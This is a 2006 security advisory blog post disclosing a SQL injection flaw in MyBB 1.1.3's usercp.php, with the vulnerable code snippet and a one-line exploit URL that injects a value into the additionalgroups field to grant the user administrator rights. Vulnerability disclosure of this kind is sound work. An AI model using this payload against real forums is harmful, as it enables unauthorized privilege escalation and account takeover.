imei Addmimistrator’s BugBlog

——————-Summary—————-
Software: MyBB
Sowtware’s Web Site: http://www.mybboard.com
Versions: 1.1.3
Class: Remote
Status: Patched
Exploit: Available
Discovered by: imei addmimistrator
Risk Level: high
—————–Description—————
There is a security bug in MyBB 1.1.3 software (latest version fully patched) file usercp.php that allows attacker performe a SQLINJECTION attack.

bug is in result of poor checking quotations for user suplied variables in integer format while code try to cast string to integers and also forgetting to addslashing varables that will insert into a sql query.
Because this bug is in an INSERT query on user tables, there is an easy way to make your self, forum’s admin, also other attacks are possible too.
————–See Also——————
{usercp.php}near 721
if($mybb->input['showcodebuttons'] != 1)
{
$mybb->input['showcodebuttons'] = 0;
}
————–Exploit———————-
mybb/usercp.php?action=do_options&
showcodebuttons=1′,additionalgroups=’4
————–Solution———————
upgrade to vendors provided patch
————–Credit———————–
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
imei(4}Kapda(O}IR
www.myimei.com
myimei.com/security

Posted by imei on Wednesday, June 21st, 2006 at 11:24 pm.